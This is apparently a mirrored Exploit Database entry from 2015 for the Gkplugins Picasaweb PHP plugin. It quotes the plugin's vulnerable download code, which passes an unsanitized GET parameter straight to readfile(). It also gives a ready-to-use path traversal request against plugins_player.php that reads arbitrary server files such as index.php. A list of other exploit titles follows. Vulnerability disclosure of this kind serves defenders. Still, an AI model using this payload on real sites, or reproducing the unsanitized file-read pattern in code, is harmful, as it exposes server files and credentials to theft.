Gkplugins Picasaweb – Download File

Exploit Database
14 阅读

作者： TMT zno

日期： 2015-08-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37769/

# Exploit Title: Gkplugins Picasaweb Download File
# Date : 2015-08-13
# Exploit Author : TMT [VNhgroup]
# Vendor Homepage: https://gkplugins.com/
# Tested on: Windows 7

File
------------------------
$fileout = $_GET['f']; <--can you download file
$filelength = $_GET['l'];
$filestream = $_GET['start'];
if($fileout!=""){
	$fileout = urldecode($fileout);
	$filelength = urldecode($filelength);
	if($filestream!=""){
		$filelength -= $filestream;
		$filestream = "?start=".$filestream;
	}
	header('Content-Type: application/octet-stream');
	header('Content-Length: ' . $filelength);
	readfile($fileout.$filestream);
}else{
	$text = get_curl($link); 
	echo $text;
}

------------------------------
Exploit Code:
site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php

last Exploits
Gkplugins Picasaweb – Download File的更多信息

Smart Vision Script News – ‘newsdetail.php’ SQL Injection (1)：
Apache Struts – Multiple Persistent Cross-Site Scripting Vulnerabilities：
MediaInSpot CMS – SQL Injection：
Dynamic Biz Website Builder (QuickWeb) 1.0 – ‘/apps/news-events/newdetail.asp?id’ SQL Injection：
WordPress Plugin bSuite 4.0.7 – Multiple HTML Injection Vulnerabilities：
Schools Alert Management Script – Arbitrary File Read：
WordPress Plugin WPML 3.1.9 – Multiple Vulnerabilities：
INNEO Startup TOOLS 2018 M040 13.0.70.3804 – Remote Code Execution：